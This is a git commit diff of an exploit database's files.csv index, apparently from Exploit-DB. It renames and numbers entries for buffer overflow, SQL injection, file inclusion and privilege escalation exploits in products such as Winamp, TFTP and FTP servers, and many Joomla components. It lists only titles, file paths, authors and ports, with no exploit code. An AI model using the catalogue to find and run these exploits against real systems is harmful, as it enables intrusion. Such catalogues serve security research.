DB: 2016-11-05
7 new exploits Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (3) Exim 4.41 - dns_build_reverse Local Exploit Exim 4.41 - 'dns_build_reverse' Local Exploit 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC) BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC) ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1) Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Exploit Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Winamp 5.551 - MAKI Parsing Integer Overflow Exploit Winamp 5.551 - MAKI Parsing Integer Overflow Icarus 2.0 - '.icp' Local Stack Overflow (PoC) Icarus 2.0 - '.ICP' Local Stack Overflow (PoC) ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2) Rock Band CMS 0.10 - news.php Multiple SQL Injection Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (1) Winamp 5.572 - whatsnew.txt Stack Overflow Exploit Winamp 5.572 - whatsnew.txt Stack Overflow Joomla! Component com_wmtpic 1.0 - SQL Injection Joomla! Component 'com_wmtpic' 1.0 - SQL Injection TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1) Joomla! Component MediQnA 1.1 - Local File Inclusion Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion Joomla! Component My Car - Multiple Vulnerabilities Joomla! Component BF Quiz - SQL Injection (1) Joomla! Component com_jepoll - (pollid) SQL Injection Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection Joomla! Component 'com_mycar' - Multiple Vulnerabilities Joomla! Component 'com_bfquiztrial' - SQL Injection (1) Joomla! 
Component 'com_jepoll' - 'pollid' Parameter SQL Injection Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection Joomla! Component BF Quiz - SQL Injection (2) Joomla! Component 'com_bfquiztrial' - SQL Injection (2) Joomla! Component com_quran - SQL Injection Joomla! Component 'com_quran' - SQL Injection Joomla! Component com_g2bridge - Local File Inclusion Joomla! Component 'com_g2bridge' - Local File Inclusion Joomla! Component com_jsjobs - SQL Injection Joomla! Component 'com_jsjobs' - SQL Injection Joomla! Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection Joomla! Component ChronoForms (com_chronocontact) - Blind SQL Injection Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection Joomla! Component 'com_chronocontact' - Blind SQL Injection Joomla! Component com_lead - SQL Injection Joomla! Component 'com_lead' - SQL Injection Joomla! Component com_djartgallery - Multiple Vulnerabilities Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities Joomla! Component com_searchlog - SQL Injection Joomla! Component 'com_searchlog' - SQL Injection Joomla! Component com_annonces - Arbitrary File Upload Joomla! Component 'com_annonces' - Arbitrary File Upload Joomla! Component cinema - SQL Injection Joomla! Component 'com_cinema' - SQL Injection Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting Joomla! Component com_jstore - SQL Injection Joomla! Component com_jtickets - SQL Injection Joomla! Component com_jcommunity - SQL Injection Joomla! Component com_jmarket - SQL Injection Joomla! Component com_jsubscription - SQL Injection Joomla! Component 'com_jstore' - SQL Injection Joomla! Component 'com_jtickets' - SQL Injection Joomla! Component 'com_jcommunity' - SQL Injection Joomla! Component 'com_jmarket' - SQL Injection Joomla! Component 'com_jsubscription' - SQL Injection Joomla! 
Component com_jnewsletter - SQL Injection Joomla! Component 'com_jnewsletter' - SQL Injection Joomla! Component com_joomdocs - Cross-Site Scripting Joomla! Component Answers 2.3beta - Multiple Vulnerabilities Joomla! Component ozio Gallery 2 - Multiple Vulnerabilities Joomla! Component listbingo 1.3 - Multiple Vulnerabilities Joomla! Component 'com_joomdocs' - Cross-Site Scripting Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting Joomla! Component 'RSComments' 1.0.0 - Persistent Cross-Site Scripting Joomla! Component com_eportfolio - Arbitrary File Upload Joomla! Component 'com_eportfolio' - Arbitrary File Upload Joomla! Component Template BizWeb com_community - Persistent Cross-Site Scripting Joomla! Component Hot Property com_jomestate - Remote File Inclusion Joomla! Component 'com_community' - Persistent Cross-Site Scripting Joomla! Component 'com_jomestate' - Remote File Inclusion Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting Joomla! Component 'JomSocial' 1.6.288 - Multiple Cross-Site Scripting Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection Joomla! Component 'com_ybggal' 1.0 - 'catid' Parameter SQL Injection Joomla! Component Picasa2Gallery - Local File Inclusion Joomla! Component 'com_picasa2gallery' - Local File Inclusion Joomla! Component JE Ajax Event Calendar - SQL Injection Joomla! Component 'jeeventcalendar' - SQL Injection Joomla! Component com_realtyna - Local File Inclusion Joomla! Component 'com_realtyna' - Local File Inclusion Joomla! Component JE Story Submit - SQL Injection Joomla! Component com_sef - Remote File Inclusion Joomla! Component 'jesubmit' - SQL Injection Joomla! Component 'com_sef' - Remote File Inclusion Joomla! Component JE Awd Song - Persistent Cross-Site Scripting Joomla! 
Component JE Media Player - Local File Inclusion Joomla! Component 'com_awd_song' - Persistent Cross-Site Scripting Joomla! Component 'JE Media Player' - Local File Inclusion Joomla! Component JE Event Calendar - Local File Inclusion Joomla! Component JE Job com_jejob - Local File Inclusion Joomla! Component JE Section Finder - Local File Inclusion Joomla! Component 'jeeventcalendar' - Local File Inclusion Joomla! Component 'com_jejob' - Local File Inclusion Joomla! Component 'jesectionfinder' - Local File Inclusion Joomla! Component gamesbox com_gamesbox 1.0.2 - 'id' SQL Injection Joomla! Component Joomanager - SQL Injection Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection Joomla! Component 'Joomanager' - SQL Injection Joomla! Component com_dateconverter 0.1 - SQL Injection Joomla! Component 'com_dateconverter' 0.1 - SQL Injection Joomla! Component Front-End Article Manager System - Arbitrary File Upload Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload Joomla! Component Seyret Video (com_seyret) - Blind SQL Injection Joomla! Component 'com_seyret' - Blind SQL Injection Joomla! Component Seyret (com_seyret) - Local File Inclusion Joomla! Component 'com_seyret' - Local File Inclusion Joomla! Component eventcal 1.6.4 com_eventcal - Blind SQL Injection Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection Joomla! Component SocialAds com_socialads - Persistent Cross-Site Scripting Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting Joomla! Component Phoca Gallery (com_phocagallery) - SQL Injection Joomla! Component Front-edit Address Book (com_addressbook) - Blind SQL Injection Joomla! Component 'com_phocagallery' - SQL Injection Joomla! Component 'com_addressbook' - Blind SQL Injection Joomla! Component NijnaMonials (com_ninjamonials) - Blind SQL Injection Joomla! Component SEF (com_sef) - Local File Inclusion Joomla! Component 'com_ninjamonials' - Blind SQL Injection Joomla! 
Component 'com_sef' - Local File Inclusion Joomla! Component JPodium (com_jpodium) - SQL Injection Joomla! Component 'com_jpodium' - SQL Injection Joomla! Component com_autartimonial - SQL Injection Joomla! Component 'com_autartimonial' - SQL Injection TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2) Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit) Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit) Microsoft Excel 2010 - Crash PoC (1) Microsoft Excel 2010 - Crash (PoC) (1) Brooky CubeCart 2.0.1 - SQL Injection Brooky CubeCart 2.0.1/2.0.4 - ndex.php language Parameter Cross-Site Scripting Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting Joomla! Component Percha Downloads Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component Percha Gallery 1.6 Beta - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities Joomla! Component com_sar_news - 'id' Parameter SQL Injection Joomla! Component 'com_sar_news' - 'id' Parameter SQL Injection Joomla! Component Jreservation - Cross-Site Scripting Joomla! Component com_videowhisper_2wvc - Cross-Site Scripting Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion Joomla! Component Miniwork Studio Canteen 1.0 - SQL Injection / Local File Inclusion Joomla! 
Component 'com_canteen' 1.0 - Local File Inclusion Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (2) IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation VLC Media Player 2.2.1 - Buffer Overflow VideoLAN VLC Media Player 2.2.1 - Buffer Overflow Just Dial Clone Script - SQL Injection Just Dial Clone Script - SQL Injection (1) Just Dial Clone Script - SQL Injection Just Dial Clone Script - SQL Injection (2) IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow
parent
1edbc5ecc4
commit
c65daa1397
13 changed files with 576 additions and 149 deletions
178
files.csv
178
files.csv
|
@ -511,7 +511,7 @@ id,file,description,date,author,platform,type,port
|
|||
659,platforms/cgi/webapps/659.txt,"Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps,0
|
||||
660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80
|
||||
662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager 2.2 - Denial of Service",2004-11-28,Xtiger,windows,dos,0
|
||||
663,platforms/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow",2004-11-29,muts,windows,remote,143
|
||||
663,platforms/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (3)",2004-11-29,muts,windows,remote,143
|
||||
664,platforms/windows/dos/664.c,"Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow",2004-11-29,NoPh0BiA,windows,dos,0
|
||||
665,platforms/windows/dos/665.c,"Orbz Game 2.10 - Remote Buffer Overflow",2004-11-29,"Luigi Auriemma",windows,dos,0
|
||||
667,platforms/windows/dos/667.c,"Jana Server 2.4.4 - (http/pna) Denial of Service",2004-11-30,"Luigi Auriemma",windows,dos,0
|
||||
|
@ -820,7 +820,7 @@ id,file,description,date,author,platform,type,port
|
|||
1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - register.php SQL Injection",2005-05-20,deluxe89,php,webapps,0
|
||||
1007,platforms/multiple/remote/1007.html,"Mozilla Firefox - view-source:JavaScript url Code Execution",2005-05-21,mikx,multiple,remote,0
|
||||
1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS - Denial of Service",2005-05-21,"Daniel Hartmeier",multiple,dos,0
|
||||
1009,platforms/linux/local/1009.c,"Exim 4.41 - dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0
|
||||
1009,platforms/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local Exploit",2005-05-25,Plugger,linux,local,0
|
||||
1010,platforms/asp/webapps/1010.pl,"Maxwebportal 1.36 - Password.asp Change Password Exploit (3) (Perl)",2005-05-26,Alpha_Programmer,asp,webapps,0
|
||||
1011,platforms/asp/webapps/1011.php,"Maxwebportal 1.36 - Password.asp Change Password Exploit (2) (PHP)",2005-05-26,mh_p0rtal,asp,webapps,0
|
||||
1012,platforms/asp/webapps/1012.txt,"Maxwebportal 1.36 - Password.asp Change Password Exploit (1) (HTML)",2005-05-26,"Soroush Dalili",asp,webapps,0
|
||||
|
@ -2546,7 +2546,7 @@ id,file,description,date,author,platform,type,port
|
|||
2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0
|
||||
2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0
|
||||
2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - (import-mt.php) Remote File Inclusion",2006-11-29,tarkus,php,webapps,0
|
||||
2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit",2006-11-30,cthulhu,windows,remote,69
|
||||
2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow",2006-11-30,cthulhu,windows,remote,69
|
||||
2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0
|
||||
2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0
|
||||
2869,platforms/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0
|
||||
|
@ -2805,10 +2805,10 @@ id,file,description,date,author,platform,type,port
|
|||
3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0
|
||||
3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0
|
||||
3127,platforms/windows/dos/3127.c,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
|
||||
3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
|
||||
3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
|
||||
3130,platforms/osx/dos/3130.c,"Apple Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0
|
||||
3131,platforms/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0
|
||||
3132,platforms/windows/remote/3132.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,69
|
||||
3132,platforms/windows/remote/3132.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",windows,remote,69
|
||||
3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,143
|
||||
3134,platforms/php/webapps/3134.php,"KGB 1.9 - (sesskglogadmin.php) Local File Inclusion",2007-01-15,Kacper,php,webapps,0
|
||||
3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps,0
|
||||
|
@ -7837,7 +7837,7 @@ id,file,description,date,author,platform,type,port
|
|||
8318,platforms/php/webapps/8318.txt,"JobHut 1.2 - (pk) SQL Injection",2009-03-30,K-159,php,webapps,0
|
||||
8319,platforms/php/webapps/8319.txt,"family connection 1.8.1 - Multiple Vulnerabilities",2009-03-30,"Salvatore Fresta",php,webapps,0
|
||||
8320,platforms/multiple/dos/8320.py,"Opera 9.64 - (7400 nested elements) XML Parsing Remote Crash",2009-03-30,"Ahmed Obied",multiple,dos,0
|
||||
8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Exploit",2009-03-30,"Encrypt3d.M!nd ",windows,remote,0
|
||||
8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,"Encrypt3d.M!nd ",windows,remote,0
|
||||
8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation (PoC)",2009-03-30,b1@ckeYe,windows,local,0
|
||||
8323,platforms/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injections",2009-03-31,"Salvatore Fresta",php,webapps,0
|
||||
8324,platforms/php/webapps/8324.php,"Podcast Generator 1.1 - Remote Code Execution",2009-03-31,BlackHawk,php,webapps,0
|
||||
|
@ -8287,7 +8287,7 @@ id,file,description,date,author,platform,type,port
|
|||
8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow",2009-05-26,Nine:Situations:Group,windows,local,0
|
||||
8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion",2009-05-26,girex,php,webapps,0
|
||||
8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Privilege Escalation",2009-05-26,"NT Internals",windows,local,0
|
||||
8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0
|
||||
8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow",2009-05-26,n00b,windows,local,0
|
||||
8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - (vbplaza.php) Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps,0
|
||||
8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET - Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps,0
|
||||
8786,platforms/multiple/remote/8786.txt,"Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure",2009-05-26,venatir,multiple,remote,0
|
||||
|
@ -8628,7 +8628,7 @@ id,file,description,date,author,platform,type,port
|
|||
9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0
|
||||
9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,remote,0
|
||||
9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,cgi,webapps,0
|
||||
9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.icp' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0
|
||||
9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0
|
||||
9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z - '.Mpr' Local Buffer Overflow",2009-07-14,n00b,windows,local,0
|
||||
9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0
|
||||
9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0
|
||||
|
@ -8938,7 +8938,7 @@ id,file,description,date,author,platform,type,port
|
|||
9465,platforms/php/webapps/9465.txt,"phpfreeBB 1.0 - Blind SQL Injection",2009-08-18,Moudi,php,webapps,0
|
||||
9466,platforms/windows/local/9466.pl,"Playlistmaker 1.51 - '.m3u' Local Buffer Overflow (SEH)",2009-08-18,blake,windows,local,0
|
||||
9467,platforms/windows/dos/9467.pl,"KOL Player 1.0 - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,Evil.Man,windows,dos,0
|
||||
9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow",2009-08-18,Wraith,windows,remote,69
|
||||
9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,windows,remote,69
|
||||
9469,platforms/php/webapps/9469.txt,"Ultimate Fade-in Slideshow 1.51 - Arbitrary File Upload",2009-08-18,"NeX HaCkEr",php,webapps,0
|
||||
9470,platforms/php/webapps/9470.txt,"PHP Email Manager - 'remove.php ID' SQL Injection",2009-08-18,MuShTaQ,php,webapps,0
|
||||
9471,platforms/php/webapps/9471.txt,"CBAuthority - ClickBank Affiliate Management SQL Injection",2009-08-18,"Angela Chang",php,webapps,0
|
||||
|
@ -9023,7 +9023,7 @@ id,file,description,date,author,platform,type,port
|
|||
9550,platforms/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflows (SEH)",2009-08-31,hack4love,windows,local,0
|
||||
9551,platforms/windows/local/9551.py,"Media Jukebox 8 - '.pls' Universal Local Buffer Exploit (SEH)",2009-08-31,mr_me,windows,local,0
|
||||
9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta - (listings.php op) SQL Injection",2009-08-31,Mr.SQL,php,webapps,0
|
||||
9553,platforms/php/webapps/9553.txt,"Rock Band CMS 0.10 - news.php Multiple SQL Injection",2009-08-31,Affix,php,webapps,0
|
||||
9553,platforms/php/webapps/9553.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (1)",2009-08-31,Affix,php,webapps,0
|
||||
9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot Exploit",2009-08-31,TheLeader,windows,dos,0
|
||||
9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX - 'spnews.php' SQL Injection",2009-08-31,HxH,php,webapps,0
|
||||
9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution",2009-08-31,flyh4t,php,webapps,0
|
||||
|
@ -10327,7 +10327,7 @@ id,file,description,date,author,platform,type,port
|
|||
11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0
|
||||
11249,platforms/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,php,webapps,0
|
||||
11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0
|
||||
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0
|
||||
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
|
||||
11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0
|
||||
11257,platforms/windows/remote/11257.rb,"AOL 9.5 - Phobos.Playlist 'Import()' Buffer Overflow (Metasploit)",2010-01-25,Trancer,windows,remote,0
|
||||
11258,platforms/php/webapps/11258.html,"Status2k - Remote Add Admin",2010-01-25,alnjm33,php,webapps,0
|
||||
|
@ -10831,7 +10831,7 @@ id,file,description,date,author,platform,type,port
|
|||
11834,platforms/windows/local/11834.py,"Kenward Zipper 1.4 - Stack Buffer Overflow (PoC)",2010-03-22,mr_me,windows,local,0
|
||||
11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - (Authentication Bypass) SQL Injection",2010-03-22,"cr4wl3r ",php,webapps,0
|
||||
11836,platforms/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps,0
|
||||
14128,platforms/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0
|
||||
14128,platforms/php/webapps/14128.txt,"Joomla! Component 'com_wmtpic' 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0
|
||||
11837,platforms/php/webapps/11837.txt,"Uiga Fan Club - SQL Injection",2010-03-22,"Sioma Labs",php,webapps,0
|
||||
11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0
|
||||
11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0
|
||||
|
@ -11508,7 +11508,7 @@ id,file,description,date,author,platform,type,port
|
|||
12601,platforms/php/webapps/12601.txt,"Joomla! Component com_jejob JE Job 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
|
||||
12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0
|
||||
12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - 'DELE' Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
|
||||
12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
|
||||
12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)",2010-05-14,"Jeremiah Talamantes",windows,dos,0
|
||||
12605,platforms/windows/dos/12605.html,"IncrediMail - 'ImShExtU.dll' ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0
|
||||
12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0
|
||||
12607,platforms/php/webapps/12607.txt,"Joomla! Component com_jequoteform - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0
|
||||
|
@ -11655,7 +11655,7 @@ id,file,description,date,author,platform,type,port
|
|||
12767,platforms/php/webapps/12767.txt,"parlic Design - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0
|
||||
14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow",2010-07-10,blake,windows,remote,0
|
||||
12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script - SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0
|
||||
12769,platforms/php/webapps/12769.txt,"Joomla! Component MediQnA 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,php,webapps,0
|
||||
12769,platforms/php/webapps/12769.txt,"Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,php,webapps,0
|
||||
12770,platforms/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,php,webapps,0
|
||||
12771,platforms/php/webapps/12771.txt,"Toronja CMS - HTML / Cross-Site Scripting Injection",2010-05-27,CoBRa_21,php,webapps,0
|
||||
12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce - SQL Injection",2010-05-27,cyberlog,php,webapps,0
|
||||
|
@ -11664,10 +11664,10 @@ id,file,description,date,author,platform,type,port
|
|||
12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0
|
||||
12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0
|
||||
12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0
|
||||
12779,platforms/php/webapps/12779.txt,"Joomla! Component My Car - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
|
||||
12780,platforms/php/webapps/12780.txt,"Joomla! Component BF Quiz - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
|
||||
12781,platforms/php/webapps/12781.txt,"Joomla! Component com_jepoll - (pollid) SQL Injection",2010-05-28,v3n0m,php,webapps,0
|
||||
12782,platforms/php/webapps/12782.txt,"Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection",2010-05-28,v3n0m,php,webapps,0
|
||||
12779,platforms/php/webapps/12779.txt,"Joomla! Component 'com_mycar' - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
|
||||
12780,platforms/php/webapps/12780.txt,"Joomla! Component 'com_bfquiztrial' - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
|
||||
12781,platforms/php/webapps/12781.txt,"Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
